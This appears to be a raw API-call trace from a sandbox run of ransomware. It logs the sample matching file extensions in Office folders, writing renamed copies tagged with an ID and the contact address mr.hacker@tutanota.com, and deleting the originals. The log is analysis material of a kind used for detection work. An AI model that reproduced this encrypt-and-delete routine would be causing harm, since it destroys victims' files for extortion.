lstrlenW (lpString=".doc") returned 4 [0057.833] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0057.833] lstrlenW (lpString=".docx") returned 5 [0057.833] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0057.833] lstrlenW (lpString=".pdf") returned 4 [0057.834] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0057.834] lstrlenW (lpString=".xls") returned 4 [0057.834] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0057.834] lstrlenW (lpString=".xlsx") returned 5 [0057.834] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0057.834] lstrlenW (lpString=".ppt") returned 4 [0057.834] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0057.834] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0057.834] lstrlenW (lpString=".zip") returned 4 [0057.834] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0057.834] lstrlenW (lpString=".rar") returned 4 [0057.834] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0057.834] lstrlenW (lpString=".bz2") returned 4 [0057.834] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0057.834] lstrlenW (lpString=".7z") returned 3 [0057.834] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0057.834] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0057.834] lstrlenW (lpString=".dbf") returned 4 [0057.834] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0057.834] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0057.834] lstrlenW (lpString=".1cd") returned 4 [0057.834] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0057.834] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0057.834] lstrlenW (lpString=".jpg") returned 4 [0057.834] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0057.834] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0057.834] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0057.834] lstrlenW (lpString=".doc") returned 4 [0057.834] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0057.834] lstrlenW (lpString=".docx") returned 5 [0057.834] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0057.834] lstrlenW (lpString=".pdf") returned 4 [0057.835] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0057.835] lstrlenW (lpString=".xls") returned 4 [0057.835] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0057.835] lstrlenW (lpString=".xlsx") returned 5 [0057.835] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0057.835] lstrlenW (lpString=".ppt") returned 4 [0057.835] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0057.835] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0057.835] lstrlenW (lpString=".zip") returned 4 [0057.835] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0057.835] lstrlenW (lpString=".rar") returned 4 [0057.835] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0057.835] lstrlenW (lpString=".bz2") returned 4 [0057.835] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0057.835] lstrlenW (lpString=".7z") returned 3 [0057.835] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0057.835] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0057.835] lstrlenW (lpString=".dbf") returned 4 [0057.835] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0057.835] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0057.835] lstrlenW (lpString=".1cd") returned 4 [0057.835] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0057.835] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0057.835] lstrlenW (lpString=".jpg") returned 4 [0057.835] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0057.835] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".USA") returned -1 [0057.835] lstrlenW (lpString="MSOINTL.DLL.IDX_DLL") returned 19 [0057.835] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0057.836] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x375ff1c | out: lpFileSize=0x375ff1c*=55680) returned 1 [0057.836] CloseHandle (hObject=0x1f0) returned 1 [0057.836] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll")) returned 0x20 [0057.836] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0057.836] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0057.836] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.836] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.836] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0057.837] GetLastError () returned 0x0 [0057.837] ReadFile (in: hFile=0x1f0, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0xd980, lpOverlapped=0x0) returned 1 [0057.842] WriteFile (in: hFile=0x220, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xd990, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0xd990, lpOverlapped=0x0) returned 1 [0057.844] ReadFile (in: hFile=0x1f0, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0x0, lpOverlapped=0x0) returned 1 [0057.844] WriteFile (in: hFile=0x220, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0xfa, lpOverlapped=0x0) returned 1 [0057.844] SetEndOfFile (hFile=0x220) returned 1 [0057.844] CloseHandle (hObject=0x220) returned 1 [0057.844] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.844] SetEndOfFile (hFile=0x1f0) returned 1 [0057.845] CloseHandle (hObject=0x1f0) returned 1 [0057.845] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0057.846] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll")) returned 1 [0057.846] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0057.846] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0057.846] lstrlenW (lpString=".doc") returned 4 [0057.846] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1 [0057.846] lstrlenW (lpString=".docx") returned 5 [0057.846] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1 [0057.846] lstrlenW (lpString=".pdf") returned 4 [0057.846] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1 [0057.846] lstrlenW (lpString=".xls") returned 4 [0057.846] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1 [0057.846] lstrlenW (lpString=".xlsx") returned 5 [0057.846] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1 [0057.846] lstrlenW (lpString=".ppt") returned 4 [0057.846] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1 [0057.846] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0057.846] lstrlenW (lpString=".zip") returned 4 [0057.846] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1 [0057.846] lstrlenW (lpString=".rar") returned 4 [0057.846] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1 [0057.846] lstrlenW (lpString=".bz2") returned 4 [0057.846] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1 [0057.846] lstrlenW (lpString=".7z") returned 3 [0057.847] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0057.847] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0057.847] lstrlenW (lpString=".dbf") returned 4 [0057.847] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1 [0057.847] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0057.847] lstrlenW (lpString=".1cd") returned 4 [0057.847] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1 [0057.847] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0057.847] lstrlenW (lpString=".jpg") returned 4 [0057.847] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1 [0057.847] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0057.847] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0057.847] lstrlenW (lpString=".doc") returned 4 [0057.847] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1 [0057.847] lstrlenW (lpString=".docx") returned 5 [0057.847] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1 [0057.847] lstrlenW (lpString=".pdf") returned 4 [0057.847] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1 [0057.847] lstrlenW (lpString=".xls") returned 4 [0057.847] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1 [0057.847] lstrlenW (lpString=".xlsx") returned 5 [0057.847] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1 [0057.847] lstrlenW (lpString=".ppt") returned 4 [0057.847] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1 [0057.847] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0057.847] lstrlenW (lpString=".zip") returned 4 [0057.847] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1 [0057.847] lstrlenW (lpString=".rar") returned 4 [0057.847] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1 [0057.847] lstrlenW (lpString=".bz2") returned 4 [0057.847] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1 [0057.847] lstrlenW (lpString=".7z") returned 3 [0057.848] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0057.848] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0057.848] lstrlenW (lpString=".dbf") returned 4 [0057.848] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1 [0057.848] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0057.848] lstrlenW (lpString=".1cd") returned 4 [0057.848] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1 [0057.848] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0057.848] lstrlenW (lpString=".jpg") returned 4 [0057.848] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1 [0057.848] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".USA") returned -1 [0057.848] lstrlenW (lpString="MSOINTL.REST.IDX_DLL") returned 20 [0057.848] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0057.848] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x375ff1c | out: lpFileSize=0x375ff1c*=1388416) returned 1 [0057.848] CloseHandle (hObject=0x1f0) returned 1 [0057.849] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll")) returned 0x20 [0057.849] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0057.849] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0057.849] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.849] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.849] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0057.849] GetLastError () returned 0x0 [0057.849] ReadFile (in: hFile=0x1f0, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0057.872] WriteFile (in: hFile=0x220, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0057.890] ReadFile (in: hFile=0x1f0, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0x52f90, lpOverlapped=0x0) returned 1 [0057.902] WriteFile (in: hFile=0x220, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0x52fa0, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0x52fa0, lpOverlapped=0x0) returned 1 [0058.182] ReadFile (in: hFile=0x1f0, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0x0, lpOverlapped=0x0) returned 1 [0058.182] WriteFile (in: hFile=0x220, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0xfc, lpOverlapped=0x0) returned 1 [0058.182] SetEndOfFile (hFile=0x220) returned 1 [0058.780] CloseHandle (hObject=0x220) returned 1 [0058.780] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.780] SetEndOfFile (hFile=0x1f0) returned 1 [0058.783] CloseHandle (hObject=0x1f0) returned 1 [0058.783] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0058.784] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll")) returned 1 [0058.784] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0058.784] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0058.784] lstrlenW (lpString=".doc") returned 4 [0058.784] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1 [0058.784] lstrlenW (lpString=".docx") returned 5 [0058.784] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1 [0058.784] lstrlenW (lpString=".pdf") returned 4 [0058.784] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1 [0058.784] lstrlenW (lpString=".xls") returned 4 [0058.784] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1 [0058.784] lstrlenW (lpString=".xlsx") returned 5 [0058.784] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1 [0058.784] lstrlenW (lpString=".ppt") returned 4 [0058.784] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1 [0058.784] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0058.784] lstrlenW (lpString=".zip") returned 4 [0058.784] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1 [0058.784] lstrlenW (lpString=".rar") returned 4 [0058.784] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1 [0058.784] lstrlenW (lpString=".bz2") returned 4 [0058.784] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1 [0058.784] lstrlenW (lpString=".7z") returned 3 [0058.785] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0058.785] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0058.785] lstrlenW (lpString=".dbf") returned 4 [0058.785] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1 [0058.785] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0058.785] lstrlenW (lpString=".1cd") returned 4 [0058.785] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1 [0058.785] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0058.785] lstrlenW (lpString=".jpg") returned 4 [0058.785] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1 [0058.785] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0058.785] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0058.785] lstrlenW (lpString=".doc") returned 4 [0058.785] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1 [0058.785] lstrlenW (lpString=".docx") returned 5 [0058.785] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1 [0058.785] lstrlenW (lpString=".pdf") returned 4 [0058.785] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1 [0058.785] lstrlenW (lpString=".xls") returned 4 [0058.785] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1 [0058.785] lstrlenW (lpString=".xlsx") returned 5 [0058.785] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1 [0058.785] lstrlenW (lpString=".ppt") returned 4 [0058.785] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1 [0058.785] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0058.785] lstrlenW (lpString=".zip") returned 4 [0058.785] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1 [0058.785] lstrlenW (lpString=".rar") returned 4 [0058.785] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1 [0058.785] lstrlenW (lpString=".bz2") returned 4 [0058.785] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1 [0058.785] lstrlenW (lpString=".7z") returned 3 [0058.785] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0058.785] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0058.785] lstrlenW (lpString=".dbf") returned 4 [0058.785] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1 [0058.785] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0058.786] lstrlenW (lpString=".1cd") returned 4 [0058.786] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1 [0058.786] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0058.786] lstrlenW (lpString=".jpg") returned 4 [0058.786] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1 [0058.786] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0058.786] lstrlenW (lpString="OARPMANR.DLL") returned 12 [0058.786] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0058.786] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x375ff1c | out: lpFileSize=0x375ff1c*=11656) returned 1 [0058.787] CloseHandle (hObject=0x1f0) returned 1 [0058.787] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll")) returned 0x20 [0058.787] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0058.787] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0058.787] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.787] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.787] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0058.788] GetLastError () returned 0x0 [0058.788] ReadFile (in: hFile=0x1f0, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0x2d88, lpOverlapped=0x0) returned 1 [0058.790] WriteFile (in: hFile=0x220, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0x2d90, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0x2d90, lpOverlapped=0x0) returned 1 [0058.791] ReadFile (in: hFile=0x1f0, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0x0, lpOverlapped=0x0) returned 1 [0058.791] WriteFile (in: hFile=0x220, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0xec, lpOverlapped=0x0) returned 1 [0058.791] SetEndOfFile (hFile=0x220) returned 1 